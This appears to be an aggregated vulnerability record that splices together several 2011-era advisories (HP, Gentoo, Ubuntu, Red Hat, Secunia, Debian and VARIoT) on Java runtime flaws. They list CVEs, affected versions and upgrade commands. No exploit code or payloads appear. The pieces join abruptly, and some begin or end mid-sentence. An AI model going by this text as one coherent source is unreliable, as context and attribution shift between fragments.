Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201111-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Oracle JRE/JDK: Multiple vulnerabilities
Date: November 05, 2011
Bugs: #340421, #354213, #370559, #387851
ID: 201111-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in the Oracle JRE/JDK,
allowing attackers to cause unspecified impact.
Background
==========
The Oracle Java Development Kit (JDK) (formerly known as Sun JDK) and
the Oracle Java Runtime Environment (JRE) (formerly known as Sun JRE)
provide the Oracle Java platform (formerly known as Sun Java Platform).
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/sun-jre-bin < 1.6.0.29 >= 1.6.0.29 *
2 app-emulation/emul-linux-x86-java
< 1.6.0.29 >= 1.6.0.29 *
3 dev-java/sun-jdk < 1.6.0.29 >= 1.6.0.29 *
-------------------------------------------------------------------
NOTE: Packages marked with asterisks require manual intervention!
-------------------------------------------------------------------
3 affected packages
-------------------------------------------------------------------
Description
===========
Multiple vulnerabilities have been reported in the Oracle Java
implementation. Please review the CVE identifiers referenced below and
the associated Oracle Critical Patch Update Advisory for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Oracle JDK 1.6 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-java/sun-jdk-1.6.0.29"
All Oracle JRE 1.6 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-java/sun-jre-bin-1.6.0.29"
All users of the precompiled 32-bit Oracle JRE 1.6 should upgrade to
the latest version:
# emerge --sync
# emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.6.0.29"
NOTE: As Oracle has revoked the DLJ license for its Java
implementation, the packages can no longer be updated automatically.
This limitation is not present on a non-fetch restricted implementation
such as dev-java/icedtea-bin.
References
==========
[ 1 ] CVE-2010-3541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541
[ 2 ] CVE-2010-3548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548
[ 3 ] CVE-2010-3549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549
[ 4 ] CVE-2010-3550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3550
[ 5 ] CVE-2010-3551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551
[ 6 ] CVE-2010-3552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3552
[ 7 ] CVE-2010-3553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553
[ 8 ] CVE-2010-3554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554
[ 9 ] CVE-2010-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3555
[ 10 ] CVE-2010-3556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3556
[ 11 ] CVE-2010-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557
[ 12 ] CVE-2010-3558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3558
[ 13 ] CVE-2010-3559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3559
[ 14 ] CVE-2010-3560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3560
[ 15 ] CVE-2010-3561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561
[ 16 ] CVE-2010-3562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562
[ 17 ] CVE-2010-3563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3563
[ 18 ] CVE-2010-3565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565
[ 19 ] CVE-2010-3566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566
[ 20 ] CVE-2010-3567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567
[ 21 ] CVE-2010-3568
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568
[ 22 ] CVE-2010-3569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569
[ 23 ] CVE-2010-3570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3570
[ 24 ] CVE-2010-3571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3571
[ 25 ] CVE-2010-3572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3572
[ 26 ] CVE-2010-3573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573
[ 27 ] CVE-2010-3574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574
[ 28 ] CVE-2010-4422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4422
[ 29 ] CVE-2010-4447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4447
[ 30 ] CVE-2010-4448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448
[ 31 ] CVE-2010-4450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450
[ 32 ] CVE-2010-4451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4451
[ 33 ] CVE-2010-4452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4452
[ 34 ] CVE-2010-4454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4454
[ 35 ] CVE-2010-4462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4462
[ 36 ] CVE-2010-4463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4463
[ 37 ] CVE-2010-4465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465
[ 38 ] CVE-2010-4466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4466
[ 39 ] CVE-2010-4467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467
[ 40 ] CVE-2010-4468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4468
[ 41 ] CVE-2010-4469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469
[ 42 ] CVE-2010-4470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470
[ 43 ] CVE-2010-4471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471
[ 44 ] CVE-2010-4472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472
[ 45 ] CVE-2010-4473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4473
[ 46 ] CVE-2010-4474
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4474
[ 47 ] CVE-2010-4475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4475
[ 48 ] CVE-2010-4476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476
[ 49 ] CVE-2011-0802
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0802
[ 50 ] CVE-2011-0814
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0814
[ 51 ] CVE-2011-0815
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815
[ 52 ] CVE-2011-0862
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862
[ 53 ] CVE-2011-0863
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0863
[ 54 ] CVE-2011-0864
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864
[ 55 ] CVE-2011-0865
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865
[ 56 ] CVE-2011-0867
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0867
[ 57 ] CVE-2011-0868
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868
[ 58 ] CVE-2011-0869
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869
[ 59 ] CVE-2011-0871
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871
[ 60 ] CVE-2011-0872
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872
[ 61 ] CVE-2011-0873
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0873
[ 62 ] CVE-2011-3389
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389
[ 63 ] CVE-2011-3516
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3516
[ 64 ] CVE-2011-3521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521
[ 65 ] CVE-2011-3544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544
[ 66 ] CVE-2011-3545
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3545
[ 67 ] CVE-2011-3546
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3546
[ 68 ] CVE-2011-3547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547
[ 69 ] CVE-2011-3548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548
[ 70 ] CVE-2011-3549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3549
[ 71 ] CVE-2011-3550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3550
[ 72 ] CVE-2011-3551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551
[ 73 ] CVE-2011-3552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552
[ 74 ] CVE-2011-3553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553
[ 75 ] CVE-2011-3554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554
[ 76 ] CVE-2011-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3555
[ 77 ] CVE-2011-3556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556
[ 78 ] CVE-2011-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557
[ 79 ] CVE-2011-3558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558
[ 80 ] CVE-2011-3560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560
[ 81 ] CVE-2011-3561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3561
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201111-02.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ===========================================================
Ubuntu Security Notice USN-1079-3 March 17, 2011
openjdk-6b18 vulnerabilities
CVE-2010-4448, CVE-2010-4450, CVE-2010-4465, CVE-2010-4469,
CVE-2010-4470, CVE-2010-4471, CVE-2010-4472, CVE-2010-4476,
CVE-2011-0706
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 10.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 10.10:
icedtea6-plugin 6b18-1.8.7-0ubuntu2.1
openjdk-6-jre 6b18-1.8.7-0ubuntu2.1
openjdk-6-jre-headless 6b18-1.8.7-0ubuntu2.1
After a standard system update you need to restart any Java services,
applications or applets to make all the necessary changes.
Details follow:
USN-1079-2 fixed vulnerabilities in OpenJDK 6 for armel (ARM)
architectures in Ubuntu 9.10 and Ubuntu 10.04 LTS.
Original advisory details:
It was discovered that untrusted Java applets could create domain
name resolution cache entries, allowing an attacker to manipulate
name resolution within the JVM. (CVE-2010-4448)
It was discovered that the Java launcher did not did not properly
setup the LD_LIBRARY_PATH environment variable. A local attacker
could exploit this to execute arbitrary code as the user invoking
the program. (CVE-2010-4450)
It was discovered that within the Swing library, forged timer events
could allow bypass of SecurityManager checks. This could allow an
attacker to access restricted resources. (CVE-2010-4465)
It was discovered that certain bytecode combinations confused memory
management within the HotSpot JVM. This could allow an attacker to
cause a denial of service through an application crash or possibly
inject code. (CVE-2010-4469)
It was discovered that the way JAXP components were handled
allowed them to be manipulated by untrusted applets. An attacker
could use this to bypass XML processing restrictions and elevate
privileges. (CVE-2010-4470)
It was discovered that the Java2D subcomponent, when processing broken
CFF fonts could leak system properties. (CVE-2010-4471)
It was discovered that a flaw in the XML Digital Signature
component could allow an attacker to cause untrusted code to
replace the XML Digital Signature Transform or C14N algorithm
implementations. (CVE-2010-4472)
Konstantin Prei\xdfer and others discovered that specific double literals
were improperly handled, allowing a remote attacker to cause a denial
of service. (CVE-2010-4476)
It was discovered that the JNLPClassLoader class when handling multiple
signatures allowed remote attackers to gain privileges due to the
assignment of an inappropriate security descriptor. (CVE-2011-0706)
Updated packages for Ubuntu 10.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7-0ubuntu2.1.diff.gz
Size/MD5: 149561 b35ae7a82db49282379d36e7ece58484
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7-0ubuntu2.1.dsc
Size/MD5: 3015 04cb459aeaab6c228e722caf07a44de9
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7.orig.tar.gz
Size/MD5: 71430490 b2811b2e53cd9abaad6959d33fe10d19
armel architecture (ARM Architecture):
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/icedtea-6-jre-cacao_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 377802 d4439da20492eafbccb33e2fe979e8c9
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/icedtea6-plugin_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 78338 7bdf93e00fd81dc82fd0d9a8b4e905c7
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-dbg_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 85497146 1512e0d6563dd5120729cf5b993c618c
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-demo_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 1545620 544c54891d44bdac534c81318a7f2bcb
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jdk_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 9140042 0a2d6ed937081800baeb6fc55326a754
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jre-headless_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 30092886 4cc5ad7c54638278e55ee7d2acaab413
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jre_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 266102 4278c2c06387cf883325356efda3c4d4
http://ports.ubuntu.com/pool/universe/o/openjdk-6b18/openjdk-6-jre-zero_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 1959296 6becfb4d5a2ecbe7aee622b84df57f12
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Low: Red Hat Network Satellite server IBM Java Runtime security update
Advisory ID: RHSA-2011:0880-01
Product: Red Hat Network Satellite Server
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-0880.html
Issue date: 2011-06-16
CVE Names: CVE-2009-3555 CVE-2010-1321 CVE-2010-3541
CVE-2010-3548 CVE-2010-3549 CVE-2010-3550
CVE-2010-3551 CVE-2010-3553 CVE-2010-3555
CVE-2010-3556 CVE-2010-3557 CVE-2010-3558
CVE-2010-3560 CVE-2010-3562 CVE-2010-3563
CVE-2010-3565 CVE-2010-3566 CVE-2010-3568
CVE-2010-3569 CVE-2010-3571 CVE-2010-3572
CVE-2010-3573 CVE-2010-3574 CVE-2010-4422
CVE-2010-4447 CVE-2010-4448 CVE-2010-4452
CVE-2010-4454 CVE-2010-4462 CVE-2010-4463
CVE-2010-4465 CVE-2010-4466 CVE-2010-4467
CVE-2010-4468 CVE-2010-4471 CVE-2010-4473
CVE-2010-4475 CVE-2010-4476
=====================================================================
1. Summary:
Updated java-1.6.0-ibm packages that fix several security issues are now
available for Red Hat Network Satellite 5.4.1 for Red Hat
Enterprise Linux 5.
The Red Hat Security Response Team has rated this update as having low
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Network Satellite Server 5.4 (RHEL v.5) - i386, s390x, x86_64
3. Description:
This update corrects several security vulnerabilities in the IBM Java
Runtime Environment shipped as part of Red Hat Network Satellite 5.4.1. In
a typical operating environment, these are of low security risk as the
runtime is not used on untrusted applets. Detailed vulnerability descriptions are linked from the IBM
"Security alerts" page, listed in the References section. (CVE-2009-3555,
CVE-2010-1321, CVE-2010-3541, CVE-2010-3548, CVE-2010-3549, CVE-2010-3550,
CVE-2010-3551, CVE-2010-3553, CVE-2010-3555, CVE-2010-3556, CVE-2010-3557,
CVE-2010-3558, CVE-2010-3560, CVE-2010-3562, CVE-2010-3563, CVE-2010-3565,
CVE-2010-3566, CVE-2010-3568, CVE-2010-3569, CVE-2010-3571, CVE-2010-3572,
CVE-2010-3573, CVE-2010-3574, CVE-2010-4422, CVE-2010-4447, CVE-2010-4448,
CVE-2010-4452, CVE-2010-4454, CVE-2010-4462, CVE-2010-4463, CVE-2010-4465,
CVE-2010-4466, CVE-2010-4467, CVE-2010-4468, CVE-2010-4471, CVE-2010-4473,
CVE-2010-4475, CVE-2010-4476)
Users of Red Hat Network Satellite 5.4.1 are advised to upgrade to these
updated java-1.6.0-ibm packages, which contain the IBM 1.6.0 SR9-FP1 Java
release. For this update to take effect, Red Hat Network Satellite must be
restarted. Refer to the Solution section for details.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
Run the following command to restart the Red Hat Network Satellite
server:
# rhn-satellite restart
5. Bugs fixed (http://bugzilla.redhat.com/):
533125 - CVE-2009-3555 TLS: MITM attacks via session renegotiation
582466 - CVE-2010-1321 krb5: null pointer dereference in GSS-API library leads to DoS (MITKRB5-SA-2010-005)
639876 - CVE-2010-3568 OpenJDK Deserialization Race condition (6559775)
639897 - CVE-2010-3562 OpenJDK IndexColorModel double-free (6925710)
639904 - CVE-2010-3557 OpenJDK Swing mutable static (6938813)
639909 - CVE-2010-3548 OpenJDK DNS server IP address information leak (6957564)
639920 - CVE-2010-3565 OpenJDK JPEG writeImage remote code execution (6963023)
639922 - CVE-2010-3566 OpenJDK ICC Profile remote code execution (6963489)
639925 - CVE-2010-3569 OpenJDK Serialization inconsistencies (6966692)
642167 - CVE-2010-3553 OpenJDK Swing unsafe reflection usage (6622002)
642180 - CVE-2010-3549 OpenJDK HttpURLConnection request splitting (6952017)
642187 - CVE-2010-3551 OpenJDK local network address disclosure (6952603)
642202 - CVE-2010-3541 CVE-2010-3573 OpenJDK HttpURLConnection allows arbitrary request headers (6961084,6980004)
642215 - CVE-2010-3574 OpenJDK HttpURLConnection incomplete TRACE permission check (6981426)
642558 - CVE-2010-3555 JDK unspecified vulnerability in Deployment component
642559 - CVE-2010-3550 JDK unspecified vulnerability in Java Web Start component
642573 - CVE-2010-3560 JDK unspecified vulnerability in Networking component
642576 - CVE-2010-3556 JDK unspecified vulnerability in 2D component
642585 - CVE-2010-3571 JDK unspecified vulnerability in 2D component
642589 - CVE-2010-3563 JDK unspecified vulnerability in Deployment component
642593 - CVE-2010-3558 JDK unspecified vulnerability in Java Web Start component
642611 - CVE-2010-3572 JDK unspecified vulnerability in Sound component
674336 - CVE-2010-4476 JDK Double.parseDouble Denial-Of-Service
675984 - CVE-2010-4465 OpenJDK Swing timer-based security manager bypass (6907662)
676019 - CVE-2010-4471 OpenJDK Java2D font-related system property leak (6985453)
676023 - CVE-2010-4448 OpenJDK DNS cache poisoning by untrusted applets (6981922)
677957 - CVE-2010-4475 JDK unspecified vulnerability in Deployment component
677958 - CVE-2010-4473 JDK unspecified vulnerability in Sound component
677959 - CVE-2010-4468 JDK unspecified vulnerability in JDBC component
677960 - CVE-2010-4467 JDK unspecified vulnerability in Deployment component
677961 - CVE-2010-4466 JDK unspecified vulnerability in Deployment component
677963 - CVE-2010-4463 JDK unspecified vulnerability in Deployment component
677966 - CVE-2010-4462 JDK unspecified vulnerability in Sound component
677967 - CVE-2010-4454 JDK unspecified vulnerability in Sound component
677968 - CVE-2010-4452 JDK unspecified vulnerability in Deployment component
677970 - CVE-2010-4447 JDK unspecified vulnerability in Deployment component
677971 - CVE-2010-4422 JDK unspecified vulnerability in Deployment component
6. Package List:
Red Hat Network Satellite Server 5.4 (RHEL v.5):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/RHNSAT/SRPMS/java-1.6.0-ibm-1.6.0.9.1-1jpp.1.el5.src.rpm
i386:
java-1.6.0-ibm-1.6.0.9.1-1jpp.1.el5.i386.rpm
java-1.6.0-ibm-devel-1.6.0.9.1-1jpp.1.el5.i386.rpm
s390x:
java-1.6.0-ibm-1.6.0.9.1-1jpp.1.el5.s390x.rpm
java-1.6.0-ibm-devel-1.6.0.9.1-1jpp.1.el5.s390x.rpm
x86_64:
java-1.6.0-ibm-1.6.0.9.1-1jpp.1.el5.x86_64.rpm
java-1.6.0-ibm-devel-1.6.0.9.1-1jpp.1.el5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2009-3555.html
https://www.redhat.com/security/data/cve/CVE-2010-1321.html
https://www.redhat.com/security/data/cve/CVE-2010-3541.html
https://www.redhat.com/security/data/cve/CVE-2010-3548.html
https://www.redhat.com/security/data/cve/CVE-2010-3549.html
https://www.redhat.com/security/data/cve/CVE-2010-3550.html
https://www.redhat.com/security/data/cve/CVE-2010-3551.html
https://www.redhat.com/security/data/cve/CVE-2010-3553.html
https://www.redhat.com/security/data/cve/CVE-2010-3555.html
https://www.redhat.com/security/data/cve/CVE-2010-3556.html
https://www.redhat.com/security/data/cve/CVE-2010-3557.html
https://www.redhat.com/security/data/cve/CVE-2010-3558.html
https://www.redhat.com/security/data/cve/CVE-2010-3560.html
https://www.redhat.com/security/data/cve/CVE-2010-3562.html
https://www.redhat.com/security/data/cve/CVE-2010-3563.html
https://www.redhat.com/security/data/cve/CVE-2010-3565.html
https://www.redhat.com/security/data/cve/CVE-2010-3566.html
https://www.redhat.com/security/data/cve/CVE-2010-3568.html
https://www.redhat.com/security/data/cve/CVE-2010-3569.html
https://www.redhat.com/security/data/cve/CVE-2010-3571.html
https://www.redhat.com/security/data/cve/CVE-2010-3572.html
https://www.redhat.com/security/data/cve/CVE-2010-3573.html
https://www.redhat.com/security/data/cve/CVE-2010-3574.html
https://www.redhat.com/security/data/cve/CVE-2010-4422.html
https://www.redhat.com/security/data/cve/CVE-2010-4447.html
https://www.redhat.com/security/data/cve/CVE-2010-4448.html
https://www.redhat.com/security/data/cve/CVE-2010-4452.html
https://www.redhat.com/security/data/cve/CVE-2010-4454.html
https://www.redhat.com/security/data/cve/CVE-2010-4462.html
https://www.redhat.com/security/data/cve/CVE-2010-4463.html
https://www.redhat.com/security/data/cve/CVE-2010-4465.html
https://www.redhat.com/security/data/cve/CVE-2010-4466.html
https://www.redhat.com/security/data/cve/CVE-2010-4467.html
https://www.redhat.com/security/data/cve/CVE-2010-4468.html
https://www.redhat.com/security/data/cve/CVE-2010-4471.html
https://www.redhat.com/security/data/cve/CVE-2010-4473.html
https://www.redhat.com/security/data/cve/CVE-2010-4475.html
https://www.redhat.com/security/data/cve/CVE-2010-4476.html
https://access.redhat.com/security/updates/classification/#low
http://www.ibm.com/developerworks/java/jdk/alerts/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFN+lm6XlSAg2UNWIIRAvBeAJ0Wz/dmuJW0q8QTp1Bq5NhaLmExvQCeM5c+
RNFKowPY3HYpgAdrm0ORV8c=
=W7VB
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
http://twitter.com/secunia
http://www.facebook.com/Secunia
----------------------------------------------------------------------
TITLE:
Hitachi JP1 Products Java Double Literal Denial of Service
Vulnerability
SECUNIA ADVISORY ID:
SA44576
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/44576/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=44576
RELEASE DATE:
2011-05-17
DISCUSS ADVISORY:
http://secunia.com/advisories/44576/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/44576/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=44576
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Hitachi has acknowledged a vulnerability in JP1 products, which can
be exploited by malicious people to cause a DoS (Denial of Service).
For more information see vulnerability #1 in:
SA43262
Please see the vendor's advisory for the list of affected products. Please see the vendor's advisory for more
details.
ORIGINAL ADVISORY:
Hitachi (Japanese):
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS11-008/index.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Such input strings represent valid
numbers and can be contained in data supplied by an attacker over the
network, leading to a denial-of-service attack.
For the old stable distribution (lenny), this problem has been fixed
in version 6b18-1.8.3-2~lenny1.
Note that this update introduces an OpenJDK package based on the
IcedTea release 1.8.3 into the old stable distribution. This
addresses several dozen security vulnerabilities, most of which are
only exploitable by malicious mobile code. A notable exception is
CVE-2009-3555, the TLS renegotiation vulnerability. This update
implements the protocol extension described in RFC 5746, addressing
this issue.
This update also includes a new version of Hotspot, the Java virtual
machine, which increases the default heap size on machines with
several GB of RAM. If you run several JVMs on the same machine, you
might have to reduce the heap size by specifying a suitable -Xmx
argument in the invocation of the "java" command.
We recommend that you upgrade your openjdk-6 packages.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
.
HP Secure Web Server (SWS) for OpenVMS running CSWS_JAVA V3.1 and earlier
| VAR-201101-0544 | No CVE | Hitachi JP1/NETM/DM Information Disclosure and Denial of Service Vulnerabilities |
CVSS V2: - CVSS V3: - Severity: - |
Hitachi JP1/NETM/DM is prone to a local information-disclosure vulnerability and a denial-of-service vulnerability.
Successfully exploiting these issues may allow an attacker to obtain sensitive information or cause the affected application to crash, denying service to legitimate users. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
